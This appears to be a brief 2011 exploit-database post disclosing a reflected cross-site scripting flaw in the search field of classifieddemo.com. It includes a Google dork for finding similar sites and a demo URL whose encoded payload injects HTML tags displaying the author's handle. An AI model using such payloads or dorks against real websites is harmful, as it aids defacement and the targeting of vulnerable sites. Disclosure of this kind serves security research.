%+ $…….#……..4………|)……..0…………\/\/ %+

%+ %+ %++++++++++++++++++++++++++++++++++++++++

# Exploit Title: Classifieddemo site XSS vulnerability
#Vendor: http://www.classifieddemo.com
# Date: 4th july,2011 # Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
#Google Dork: Copyright © 2011 Classified website

*********************************************************************************************************  BREIF DESCRIPTION

*****************************

Reflected XSS in search field in Classifieddemo site.

**********************************************************************************************************  XSS Vulnerability

********************************

{DEMO} : http://www.classifieddemo.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/ EXPLOIT:”>XSSed By r007k17

********************************************************************************************************** sp3c14l Thanks to s1d3 effects and my friends@!3.14– **********************************************************************************************************

Advertisements